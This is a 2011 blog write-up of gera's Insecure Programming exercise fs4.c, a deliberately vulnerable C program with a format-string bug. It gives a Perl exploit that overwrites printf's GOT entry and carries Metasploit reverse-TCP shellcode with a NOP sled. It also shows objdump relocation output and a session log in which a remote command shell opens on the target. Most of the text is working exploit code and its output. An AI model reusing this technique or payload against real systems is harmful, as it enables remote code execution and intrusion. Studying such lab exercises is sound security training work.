Monday, November 14, 2011

Format Strings: fs4

gera's Insecure Programming fs4.c

/* fs4.c *
* specially crafted to feed your brain by gera@core-sdi.com */

/* Have you ever heard about code reusability? */

int main(int argv,char **argc) {
char buf[256];6
snprintf(buf,sizeof buf,"%s%6$hn",argc[1]);
printf(buf);
}

Very similar to fs3, except the format string is using direct parameter access. The "%6$hn" format specifier will write to the 6th argument.

#!/usr/bin/perl

# address filler for 4 snprintf arguments
my $filler = "A" x 16;

# address for the %6$hn to write the number of characters to
# printf()'s GOT address, offset by 2 to point to the most significant bytes
# 0x0804957c -> 0x0804957e
my $addr = "\x7e\x95\x04\x08";

# shellcode
# msf3 linux/x86/shell_reverse_tcp, LHOST=192.168.0.4, badchars="\x00"`
my $shellcode =
"\xba\xbb\x01\x12\x0d\xda\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9" .
"\xb1\x12\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x4e\x30" .
"\xc9\xfa\x53\x60\xae\x57\xf9\x85\xb9\xb9\x4d\xef\x74\xb9" .
"\xf6\xae\xee\x7a\xa0\x4f\xeb\x1c\xd8\x5e\xaf\x86\x4b\x0b" .
"\x5f\x16\x3b\x42\xbe\xdb\xd1\x32\x19\x11\xa5\xe2\x1e\x70" .
"\x15\x2b\xec\x03\x1c\x2d\x17\x53\xf6\xe2\xc8\x27\x6e\x95" .
"\x39\xaa\x07\x0b\xcf\xc9\x87\x80\x46\xec\x97\x2c\x94\x6f";

# enough nops so that 49131 characters are printed. this will overwrite printf's base address in GOT with 0xbfff
my $nops = "\x90" x (49131-length($shellcode));

print $filler.$addr.$nops.$shellcode;

Since there is a printf call after the snprintf call, I'm overwriting printf's GOT entry to point to the nop slide and shellcode.

dennis@ipa:~/fs4$ objdump -R fs4

fs4: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049588 R_386_GLOB_DAT __gmon_start__
08049570 R_386_JUMP_SLOT __register_frame_info
08049574 R_386_JUMP_SLOT __deregister_frame_info
08049578 R_386_JUMP_SLOT __libc_start_main
0804957c R_386_JUMP_SLOT printf
08049580 R_386_JUMP_SLOT __cxa_finalize
08049584 R_386_JUMP_SLOT snprintf


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.38:49209) at 2011-11-14 20:48:16 -0600

id
uid=500(dennis) gid=500(dennis) groups=500(dennis)
pwd
/home/dennis/fs4

[*] Command shell session 1 closed. Reason: Died from EOFError

No comments:

Post a Comment